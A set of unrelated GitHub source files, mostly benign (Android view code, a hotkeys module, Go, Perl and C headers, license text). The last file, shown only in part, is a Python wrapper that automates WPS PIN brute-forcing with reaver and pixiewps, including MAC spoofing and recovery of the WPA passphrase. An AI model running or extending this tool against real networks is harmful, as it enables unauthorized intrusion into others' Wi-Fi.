int pageWidth = child.getMeasuredWidth();
View match = child.findViewById(mMatchWidthChildResId);
if (match == null) {
throw new NullPointerException(
"MatchWithChildResId did not find that ID in the first fragment of the ViewPager; "
+ "is that view defined in the child view's layout? Note that MultiViewPager "
+ "only measures the child for index 0.");
}
int childWidth = match.getMeasuredWidth();
// Check that the measurement was successful
if (childWidth > 0) {
mNeedsMeasurePage = false;
int difference = pageWidth - childWidth;
setPageMargin(-difference);
int offscreen = (int) Math.ceil((float) pageWidth / (float) childWidth) + 1;
setOffscreenPageLimit(offscreen);
requestLayout();
}
}
}
@Override
protected void onSizeChanged(int w, int h, int oldw, int oldh) {
super.onSizeChanged(w, h, oldw, oldh);
// Schedule a new measurement pass as the dimensions have changed
mNeedsMeasurePage = true;
}
/**
* Sets the child view inside a page to match the page size against.
*
* @param matchChildWidthResId
*/
public void setMatchChildWidth(int matchChildWidthResId) {
if (mMatchWidthChildResId != matchChildWidthResId) {
mMatchWidthChildResId = matchChildWidthResId;
mNeedsMeasurePage = true;
}
}
/**
* Sets the maximum size.
*
* @param width
*/
public void setMaxWidth(int width) {
mMaxWidth = width;
}
/**
* Sets the maximum size.
*
* @param height
*/
public void setMaxHeight(int height) {
mMaxHeight = height;
}
}
| {
"pile_set_name": "Github"
} |
class Hotkeys extends SimpleModule
@count: 0
@keyNameMap:
# Keys with words or arrows on them
8:"Backspace", 9:"Tab", 13:"Enter", 16:"Shift", 17:"Control", 18:"Alt",
19:"Pause", 20:"CapsLock", 27:"Esc", 32:"Spacebar", 33:"PageUp",
34:"PageDown", 35:"End", 36:"Home", 37:"Left", 38:"Up", 39:"Right",
40:"Down", 45:"Insert", 46:"Del", 91: "Meta", 93: "Meta",
# Number keys on main keyboard (not keypad)
48:"0",49:"1",50:"2",51:"3",52:"4",53:"5",54:"6",55:"7",56:"8",57:"9",
# Letter keys. Note that we don't distinguish upper and lower case
# PS. String.fromCharCode
65:"A", 66:"B", 67:"C", 68:"D", 69:"E", 70:"F", 71:"G", 72:"H", 73:"I",
74:"J", 75:"K", 76:"L", 77:"M", 78:"N", 79:"O", 80:"P", 81:"Q", 82:"R",
83:"S", 84:"T", 85:"U", 86:"V", 87:"W", 88:"X", 89:"Y", 90:"Z",
# Keypad numbers and punctuation keys. (Opera does not support these.)
96:"0",97:"1",98:"2",99:"3",100:"4",101:"5",102:"6",103:"7",104:"8",105:"9",
106:"Multiply", 107:"Add", 109:"Subtract", 110:"Decimal", 111:"Divide",
# Function keys
112:"F1", 113:"F2", 114:"F3", 115:"F4", 116:"F5", 117:"F6",
118:"F7", 119:"F8", 120:"F9", 121:"F10", 122:"F11", 123:"F12",
124:"F13", 125:"F14", 126:"F15", 127:"F16", 128:"F17", 129:"F18",
130:"F19", 131:"F20", 132:"F21", 133:"F22", 134:"F23", 135:"F24",
# Punctuation keys that don't require holding down Shift
# Hyphen is nonportable: FF returns same code as Subtract
59:";", 61:"=", 186:";", 187:"=", # Firefox and Opera return 59,61
188:",", 190:".", 191:"/", 192:"`", 219:"[", 220:"\\", 221:"]", 222:"'"
@aliases:
"escape":"esc",
"delete":"del",
"return":"enter",
"ctrl":"control",
"space":"spacebar",
"ins":"insert",
"cmd": "meta",
"command": "meta",
"wins": "meta",
"windows": "meta"
@normalize: (shortcut) ->
keys = shortcut.toLowerCase().replace(/\s+/gi, "").split "+"
keys[i] = @aliases[key] or key for key, i in keys
keyname = keys.pop()
keys.sort().push keyname
keys.join "_"
opts:
el: document
_init: ->
@id = ++ @constructor.count
@_map = {}
@_delegate = if typeof @opts.el is "string" then document else @opts.el
$(@_delegate).on "keydown.simple-hotkeys-#{@id}", @opts.el, (e) =>
@_getHander(e)?.call this, e
_getHander: (e) ->
return unless keyname = @constructor.keyNameMap[e.which]
shortcut = ""
shortcut += "alt_" if e.altKey
shortcut += "control_" if e.ctrlKey
shortcut += "meta_" if e.metaKey
shortcut += "shift_" if e.shiftKey
shortcut += keyname.toLowerCase()
@_map[shortcut]
respondTo: (subject) ->
if typeof subject is 'string'
@_map[@constructor.normalize subject]?
else
@_getHander(subject)?
add: (shortcut, handler) ->
@_map[@constructor.normalize shortcut] = handler
@
remove: (shortcut) ->
delete @_map[@constructor.normalize shortcut]
@
destroy: ->
$(@_delegate).off ".simple-hotkeys-#{@id}"
@_map = {}
@
hotkeys = (opts) ->
new Hotkeys(opts)
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package extension
import (
"github.com/apache/dubbo-go/common"
"github.com/apache/dubbo-go/config_center"
)
var (
configCenters = make(map[string]func(config *common.URL) (config_center.DynamicConfiguration, error))
)
// SetConfigCenter sets the DynamicConfiguration with @name
func SetConfigCenter(name string, v func(*common.URL) (config_center.DynamicConfiguration, error)) {
configCenters[name] = v
}
// GetConfigCenter finds the DynamicConfiguration with @name
func GetConfigCenter(name string, config *common.URL) (config_center.DynamicConfiguration, error) {
if configCenters[name] == nil {
panic("config center for " + name + " is not existing, make sure you have import the package.")
}
return configCenters[name](config)
}
| {
"pile_set_name": "Github"
} |
package Paws::ECR::GetLifecyclePolicyPreviewResponse;
use Moose;
has LifecyclePolicyText => (is => 'ro', isa => 'Str', traits => ['NameInRequest'], request_name => 'lifecyclePolicyText' );
has NextToken => (is => 'ro', isa => 'Str', traits => ['NameInRequest'], request_name => 'nextToken' );
has PreviewResults => (is => 'ro', isa => 'ArrayRef[Paws::ECR::LifecyclePolicyPreviewResult]', traits => ['NameInRequest'], request_name => 'previewResults' );
has RegistryId => (is => 'ro', isa => 'Str', traits => ['NameInRequest'], request_name => 'registryId' );
has RepositoryName => (is => 'ro', isa => 'Str', traits => ['NameInRequest'], request_name => 'repositoryName' );
has Status => (is => 'ro', isa => 'Str', traits => ['NameInRequest'], request_name => 'status' );
has Summary => (is => 'ro', isa => 'Paws::ECR::LifecyclePolicyPreviewSummary', traits => ['NameInRequest'], request_name => 'summary' );
has _request_id => (is => 'ro', isa => 'Str');
### main pod documentation begin ###
=head1 NAME
Paws::ECR::GetLifecyclePolicyPreviewResponse
=head1 ATTRIBUTES
=head2 LifecyclePolicyText => Str
The JSON lifecycle policy text.
=head2 NextToken => Str
The C<nextToken> value to include in a future
C<GetLifecyclePolicyPreview> request. When the results of a
C<GetLifecyclePolicyPreview> request exceed C<maxResults>, this value
can be used to retrieve the next page of results. This value is C<null>
when there are no more results to return.
=head2 PreviewResults => ArrayRef[L<Paws::ECR::LifecyclePolicyPreviewResult>]
The results of the lifecycle policy preview request.
=head2 RegistryId => Str
The registry ID associated with the request.
=head2 RepositoryName => Str
The repository name associated with the request.
=head2 Status => Str
The status of the lifecycle policy preview request.
Valid values are: C<"IN_PROGRESS">, C<"COMPLETE">, C<"EXPIRED">, C<"FAILED">
=head2 Summary => L<Paws::ECR::LifecyclePolicyPreviewSummary>
The list of images that is returned as a result of the action.
=head2 _request_id => Str
=cut
1; | {
"pile_set_name": "Github"
} |
//
// AnswerCell.h
// BrowseOverflow
//
// Created by Graham Lee on 26/09/2011.
// Copyright (c) 2011 Fuzzy Aliens Ltd. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface AnswerCell : UITableViewCell
@property (nonatomic, weak) IBOutlet UILabel *scoreLabel;
@property (nonatomic, weak) IBOutlet UILabel *acceptedIndicator;
@property (nonatomic, weak) IBOutlet UILabel *personName;
@property (nonatomic, weak) IBOutlet UIImageView *personAvatar;
@property (nonatomic, weak) IBOutlet UIWebView *bodyWebView;
@end
| {
"pile_set_name": "Github"
} |
The MIT License (MIT)
Copyright (c) Sindre Sorhus <[email protected]> (sindresorhus.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
| {
"pile_set_name": "Github"
} |
//-----------------------------------------------------------------------------
// DigitalRune Engine - Copyright (C) DigitalRune GmbH
// This file is subject to the terms and conditions defined in
// file 'LICENSE.TXT', which is part of this source code package.
//-----------------------------------------------------------------------------
//
/// \file MaterialMorphSkinned.fx
/// Combines the material of a model (e.g. textures) with the light buffer data.
/// Supports:
/// - Diffuse color/texture
/// - Specular color/texture
/// - Morphing (up to 5 morph targets)
/// - Mesh skinning (up to 72 bones)
//
//-----------------------------------------------------------------------------
#define MORPHING 1
#define SKINNING 1
#include "Material.fx"
| {
"pile_set_name": "Github"
} |
/*
* wm8580.h -- audio driver for WM8580
*
* Copyright 2008 Samsung Electronics.
* Author: Ryu Euiyoul
* [email protected]
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
*/
#ifndef _WM8580_H
#define _WM8580_H
#define WM8580_PLLA 1
#define WM8580_PLLB 2
#define WM8580_MCLK 1
#define WM8580_CLKOUTSRC 2
#define WM8580_CLKSRC_MCLK 1
#define WM8580_CLKSRC_PLLA 2
#define WM8580_CLKSRC_PLLB 3
#define WM8580_CLKSRC_OSC 4
#define WM8580_CLKSRC_NONE 5
#define WM8580_CLKSRC_ADCMCLK 6
#define WM8580_DAI_PAIFRX 0
#define WM8580_DAI_PAIFTX 1
#endif
| {
"pile_set_name": "Github"
} |
<body>
<a id="id1">link 1</a>
<a id="id2">link 2</a>
<a id="id3">link 3</a>
</body>
| {
"pile_set_name": "Github"
} |
package chow
import (
"github.com/OpenWhiteBox/primitives/matrix"
)
// mixColumns is each 8x8 block of the binary MixColumns matrix.
var mixColumns = [4][4]matrix.Matrix{
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x80},
matrix.Row{0x81},
matrix.Row{0x02},
matrix.Row{0x84},
matrix.Row{0x88},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
},
matrix.Matrix{
matrix.Row{0x81},
matrix.Row{0x83},
matrix.Row{0x06},
matrix.Row{0x8c},
matrix.Row{0x98},
matrix.Row{0x30},
matrix.Row{0x60},
matrix.Row{0xc0},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
},
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x80},
matrix.Row{0x81},
matrix.Row{0x02},
matrix.Row{0x84},
matrix.Row{0x88},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
},
matrix.Matrix{
matrix.Row{0x81},
matrix.Row{0x83},
matrix.Row{0x06},
matrix.Row{0x8c},
matrix.Row{0x98},
matrix.Row{0x30},
matrix.Row{0x60},
matrix.Row{0xc0},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
},
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x80},
matrix.Row{0x81},
matrix.Row{0x02},
matrix.Row{0x84},
matrix.Row{0x88},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
},
matrix.Matrix{
matrix.Row{0x81},
matrix.Row{0x83},
matrix.Row{0x06},
matrix.Row{0x8c},
matrix.Row{0x98},
matrix.Row{0x30},
matrix.Row{0x60},
matrix.Row{0xc0},
},
},
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x81},
matrix.Row{0x83},
matrix.Row{0x06},
matrix.Row{0x8c},
matrix.Row{0x98},
matrix.Row{0x30},
matrix.Row{0x60},
matrix.Row{0xc0},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x80},
matrix.Row{0x81},
matrix.Row{0x02},
matrix.Row{0x84},
matrix.Row{0x88},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
},
},
}
// unMixColumns is the same as mixColumns, except each block is inverted.
var unMixColumns = [4][4]matrix.Matrix{
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x03},
matrix.Row{0x04},
matrix.Row{0x09},
matrix.Row{0x11},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
matrix.Row{0x01},
},
matrix.Matrix{
matrix.Row{0xfe},
matrix.Row{0x03},
matrix.Row{0x07},
matrix.Row{0xf0},
matrix.Row{0x1f},
matrix.Row{0x3f},
matrix.Row{0x7f},
matrix.Row{0xff},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
},
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x03},
matrix.Row{0x04},
matrix.Row{0x09},
matrix.Row{0x11},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
matrix.Row{0x01},
},
matrix.Matrix{
matrix.Row{0xfe},
matrix.Row{0x03},
matrix.Row{0x07},
matrix.Row{0xf0},
matrix.Row{0x1f},
matrix.Row{0x3f},
matrix.Row{0x7f},
matrix.Row{0xff},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
},
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x03},
matrix.Row{0x04},
matrix.Row{0x09},
matrix.Row{0x11},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
matrix.Row{0x01},
},
matrix.Matrix{
matrix.Row{0xfe},
matrix.Row{0x03},
matrix.Row{0x07},
matrix.Row{0xf0},
matrix.Row{0x1f},
matrix.Row{0x3f},
matrix.Row{0x7f},
matrix.Row{0xff},
},
},
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0xfe},
matrix.Row{0x03},
matrix.Row{0x07},
matrix.Row{0xf0},
matrix.Row{0x1f},
matrix.Row{0x3f},
matrix.Row{0x7f},
matrix.Row{0xff},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x03},
matrix.Row{0x04},
matrix.Row{0x09},
matrix.Row{0x11},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
matrix.Row{0x01},
},
},
}
| {
"pile_set_name": "Github"
} |
namespace uTinyRipper.Classes.GraphicsSettingss
{
public enum LightmapStrippingMode
{
Automatic = 0,
Custom = 1,
}
}
| {
"pile_set_name": "Github"
} |
<RCC>
<qresource prefix="/logos">
<file alias="placeholder">assets/logos/png/media-optical-symbolic.png</file>
<file alias="folder">assets/logos/png/icon_folder.png</file>
<file alias="workstation">assets/logos/png/workstation-logo_color.png</file>
<file alias="server">assets/logos/png/server-logo_color.png</file>
<file alias="cinnamon">assets/logos/png/cinnamon_icon_grey_pattern.png</file>
<file alias="kde">assets/logos/png/kde_icon_grey_pattern.png</file>
<file alias="lxde">assets/logos/png/lxde_icon_grey_pattern.png</file>
<file alias="lxqt">assets/logos/png/lxqt_icon_grey_pattern.png</file>
<file alias="mate">assets/logos/png/mate-compiz_icon_grey_pattern.png</file>
<file alias="soas">assets/logos/png/soas_icon_grey_pattern.png</file>
<file alias="xfce">assets/logos/png/xfce_icon_grey_pattern.png</file>
<file alias="astronomy">assets/logos/png/astronomy_icon_grey_pattern.png</file>
<file alias="design">assets/logos/png/design-suite_icon_grey_pattern.png</file>
<file alias="games">assets/logos/png/games_icon_grey_pattern.png</file>
<file alias="jam">assets/logos/png/jam_icon_grey_pattern.png</file>
<file alias="robotics">assets/logos/png/robotics_icon_grey_pattern.png</file>
<file alias="scientific">assets/logos/png/scientific_icon_grey_pattern.png</file>
<file alias="security">assets/logos/png/security-lab_icon_grey_pattern.png</file>
</qresource>
<qresource prefix="/">
<file alias="metadata.json">assets/metadata.json</file>
<file alias="releases.json">assets/releases.json</file>
<file alias="focusRect">assets/focusrect.png</file>
</qresource>
</RCC>
| {
"pile_set_name": "Github"
} |
{
"id": "record-player",
"name": "Record Player",
"category": "Furniture",
"games": {
"nl": {
"orderable": true,
"sellPrice": {
"currency": "bells",
"value": 350
},
"sources": [
"Nookling stores"
],
"buyPrices": [
{
"currency": "bells",
"value": 1400
}
]
}
}
} | {
"pile_set_name": "Github"
} |
# add a target to generate API documentation with Doxygen
find_package(Doxygen)
if(DOXYGEN_FOUND)
SET(OUTPUT_DIR "${CMAKE_CURRENT_BINARY_DIR}/documentation/doxygen")
FILE(MAKE_DIRECTORY "${OUTPUT_DIR}")
FILE(TO_NATIVE_PATH ${OUTPUT_DIR} OUTPUT_DIR)
SET(OUTPUT_DIR \"${OUTPUT_DIR}\")
SET(INPUTS "${CMAKE_CURRENT_SOURCE_DIR}/code" "${CMAKE_CURRENT_SOURCE_DIR}/freespace2" "${CMAKE_CURRENT_SOURCE_DIR}/fred2" "${CMAKE_CURRENT_SOURCE_DIR}/wxfred2")
SET(INPUT_DIRS)
FOREACH(DIR IN LISTS INPUTS)
FILE(TO_NATIVE_PATH ${DIR} native_dir)
LIST(APPEND INPUT_DIRS \"${native_dir}\")
ENDFOREACH(DIR)
STRING(REPLACE ";" " " INPUT_DIRS "${INPUT_DIRS}")
CONFIGURE_FILE(${CMAKE_CURRENT_SOURCE_DIR}/fs2open.Doxyfile.in
${CMAKE_CURRENT_BINARY_DIR}/fs2open.Doxyfile
@ONLY)
add_custom_target(doxygen
${DOXYGEN_EXECUTABLE} ${CMAKE_CURRENT_BINARY_DIR}/fs2open.Doxyfile
WORKING_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}
COMMENT "Generating API documentation with Doxygen" VERBATIM
)
set_target_properties(doxygen
PROPERTIES
FOLDER "Documentation"
EXCLUDE_FROM_ALL ON
EXCLUDE_FROM_DEFAULT_BUILD ON
)
endif(DOXYGEN_FOUND)
| {
"pile_set_name": "Github"
} |
declare name "dbmeter";
declare version "1.0";
declare author "Grame";
declare license "BSD";
declare copyright "(c)GRAME 2006";
//-------------------------------------------------
// A dB Vumeter
//-------------------------------------------------
import("math.lib");
import("music.lib");
vmeter(x) = attach(x, envelop(x) : vbargraph("dB", -96, 10));
hmeter(x) = attach(x, envelop(x) : hbargraph("dB", -96, 10));
envelop = abs : max(db2linear(-96)) : linear2db : min(10) : max ~ -(96.0/SR);
process = vmeter; | {
"pile_set_name": "Github"
} |
from os import kill, system, path, chdir
from signal import alarm, signal, SIGALRM, SIGKILL
import time
import subprocess
from re import sub, compile, search
from sys import argv
REAVER = 'reaver'
PIXIEWPS = 'pixiewps'
WASH = 'wash'
AIRMON = 'airmon-ng'
MACCHANGER = 'macchanger'
GIT = 'git'
INFO = '\033[32m[+] \033[0m' # Verde
ALERTA = '\033[31m[!] \033[0m' # Rojo
INPUT = '\033[34m[>] \033[0m' # Azul
DATA = '\033[33m[DATA] \033[0m' #Amarillo
OPCION = '\033[33m[!!!] \033[0m' #Amarillo
USE_REAVER = False # Si False usa wash y termina.
USE_PIXIEWPS = False # Intenta averiguar el pin WPS con pixiewps
WASH_TIME = 11 # Tiempo para que wash recopile APs con WPS
WASH_CHANNEL = '' # Todos
REAVER_TIME = 6 # Tiempo para que reaver recopile la informacion
CHOICES_YES = ['S', 's', '', 'si', 'Si']
CHOICES_NOPE = ['N', 'n', 'no', 'No']
PROMPT_APS = False
OUTPUT = False
OUTPUT_FILE = 'data.txt'
PRINT_REAVER = True
PRINT_PIXIE = True
GET_PASSWORD = False
FOREVER = False
OVERRIDE = False
def banner():
"""
Imprime el banner en la pantalla
"""
print
print "\t ____ _ "
print "\t| _ \ _ ___ _(_) _____ ___ __ ___ "
print "\t| |_) | | | \ \/ / |/ _ \ \ /\ / / \'_ \/ __|"
print "\t| __/| |_| |> <| | __/\ V V /| |_) \__ \\"
print "\t|_| \__, /_/\_\_|\___| \_/\_/ | .__/|___\\"
print "\t |___/ |_| "
print
print "\tHecho por jgilhutton"
print "\tReaver 1.5.2 mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg"
print "\tCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>"
print "\tPixiewps Copyright (c) 2015, wiire <[email protected]>"
print "\tMacchanger por Alvaro Ortega Copyright (C) 2003 Free Software Foundation, Inc."
print
def arg_parser():
"""
Detecta los argumentos y devuelve la ayuda si hay algun problema
"""
global PRINT_PIXIE
global PRINT_REAVER
global USE_REAVER
global USE_PIXIEWPS
global WASH_TIME
global REAVER_TIME
global WASH_CHANNEL
global PROMPT_APS
global OUTPUT_FILE
global OUTPUT
global GET_PASSWORD
global FOREVER
global OVERRIDE
H = ['-h','--help']
binary_flags = ['-w','-t','-c','-o']
for arg in argv[1:]:
if arg in H:
help()
exit()
elif argv[argv.index(arg)-1] in binary_flags:
continue
elif arg == '-q' or arg == '--quiet':
PRINT_PIXIE = False
PRINT_REAVER = False
elif arg == '-r' or arg == '--use-reaver':
USE_REAVER = True
elif arg == '-p' or arg == '--use-pixie':
USE_PIXIEWPS = True
elif arg == '-w' or arg == '--wash-time':
try:
WASH_TIME = int(argv[argv.index(arg)+1])
except ValueError:
help()
elif arg == '-t' or arg == '--tiempo':
try:
REAVER_TIME = int(argv[argv.index(arg)+1])
except ValueError:
help()
elif arg == '-c' or arg == '--canal':
try:
WASH_CHANNEL = int(argv[argv.index(arg)+1])
except ValueError:
help()
elif arg == '-P' or arg == '--prompt':
PROMPT_APS = True
elif arg == '-o' or arg == '--output':
OUTPUT = True
OUTPUT_FILE = argv[argv.index(arg)+1]
elif arg == '-f' or arg == '--pass':
GET_PASSWORD = True
elif arg == '-F' or arg == '--forever':
FOREVER = True
elif arg == '-O' or arg == '--override':
OVERRIDE = True
else:
help()
def help():
"""
Muestra la ayuda y sale
"""
print
print "script -r -p -w 15 -t 6 -c 7 -P -o file.txt -f"
print "script --use-reaver --use-pixie --wash-time 15 --tiempo 6 --canal 7 --prompt --output file.txt -h"
print
print '\t-r --use-reaver Captura la informacion del AP con Reaver. [False]'
print '\t-p --use-pixie Una vez que captura la informacion con Reaver [False]'
print '\t intenta sacar el pin WPS del router.'
print '\t-w --wash-time [tiempo] Setea el tiempo que va a usar para enumerar los [15]'
print '\t ap con WPS.'
print '\t-t --tiempo [tiempo] Setea el tiempo que va a usar para recolectar la [6]'
print '\t informacion del AP.'
print '\t-c --canal [canal] Proporciona el canal en el que escucha para enumerar'
print '\t los AP con WPS. Si no se usa, se escanean todos los canales.'
print '\t-P --prompt Si se encuentra mas de un AP con WPS, preguntar a cual [False]'
print '\t se quiere atacar.'
print '\t-o --output [archivo] Graba los datos en un archivo de texto.'
print '\t-f --pass Si se tiene exito al averiguar el pin WPS, tambien'
print '\t tratar de averiguar la clave WPA.'
print '\t-q --quiet No muestra la informacion recopilada.'
print '\t-F --forever Corre el programa indefinidamente hasta que se lo interrumpa'
print '\t-O --override Vuelve a atacar APs con pines que ya han sido conseguidos'
print '\t sin preguntar.'
print
exit()
class Engine():
"""
Aca se chequea todo, y se empieza el programa
"""
def __init__(self):
self.REAVER = True
self.PIXIEWPS = True
self.WASH = True
self.AIRMON = True
self.MACCHANGER = True
self.GIT = True
def start(self):
"""
Crea el colchon para los programas necesarios
"""
chdir('/root/')
if not c.check_iface(): # check_iface devuelve True si hay alguna ifaz en mon previamente
c.set_iface("UP")
else:
print INFO + "Se encontro una interfaz en modo monitor: %s" %c.IFACE_MON
choice = raw_input("%sDesea usar esta interfaz? [S/n] " %INPUT)
if choice in CHOICES_YES:
pass
elif choice in CHOICES_NOPE:
c.set_iface("DOWN")
c.set_iface("UP")
if FOREVER:
while True:
attack = Attack()
attack.get_wps_aps()
else:
attack = Attack()
attack.get_wps_aps()
engine.exit_limpio()
def parse_wash(self, linea):
"""
Analiza el output del wash
linea viene sin el salto de linea, separando las cosas con "|"
Devuelve bssid, canal, essid e instancia de Target
"""
linea = linea.split('|')
bssid = linea[0] # MAC
canal = linea[1]
essid = linea[-1]
return [bssid, canal, essid]
def parse_reaver(self, output, pin_encontrado = False):
"""
Analiza el output del reaver
Saca el pkr, pke, hash1 y 2, enonce, rnonce, authkey, fabricante y modelo
y los devuelve
"""
if pin_encontrado:
password = ''
for linea in output:
if '[+] WPA PSK: ' in linea:
password = sub('\[\+\] WPA PSK: ','',linea)
return password
if password == '':
return 'no password'
E_NONCE = ''
R_NONCE = ''
PKR = ''
PKE = ''
HASH1 = ''
HASH2 = ''
AUTHKEY = ''
MANUFACTURER = ''
MODEL = ''
NUMBER = ''
uberlista = []
lista_final = []
is_complete = False
has_something = False
if output == '':
return 'cacota'
for linea in output:
if 'E-Nonce' in linea:
has_something = True
elif 'E-Hash2' in linea:
lista_final = output[0:output.index(linea)+1] # Trunca el output hasta el hash2
is_complete = True
break
elif 'Detected AP rate limiting' in linea:
return 'ap rate limited'
if has_something and not is_complete:
return 'more time please'
elif has_something == False:
return 'noutput'
for linea in lista_final:
if 'E-Nonce' in linea:
E_NONCE = sub('\[P\] E-Nonce: ','',linea)
elif 'R-Nonce' in linea:
R_NONCE = sub('\[P\] R-Nonce: ','',linea)
elif 'PKR' in linea:
PKR = sub('\[P\] PKR: ','',linea)
elif 'PKE' in linea:
PKE = sub('\[P\] PKE: ','',linea)
elif 'E-Hash1' in linea:
HASH1 = sub('\[P\] E-Hash1: ','',linea)
elif 'E-Hash2' in linea:
HASH2 = sub('\[P\] E-Hash2: ','',linea)
elif 'AuthKey' in linea:
AUTHKEY = sub('\[P\] AuthKey: ','',linea)
elif 'Manufacturer' in linea:
MANUFACTURER = sub('\[P\] WPS Manufacturer: ','',linea)
elif 'Model Name' in linea:
MODEL = sub('\[P\] WPS Model Name: ','',linea)
elif 'Model Number' in linea:
NUMBER = sub('\[P\] WPS Model Number: ','',linea)
elif '[+] Associated with ' in linea:
ESSID = sub('\(ESSID\: ','|',linea)
ESSID = ESSID.split('|')[-1][:-2]
elif '[+] Waiting for beacon from ' in linea:
BSSID = sub('\[\+\] Waiting for beacon from ','',linea)
else:
pass
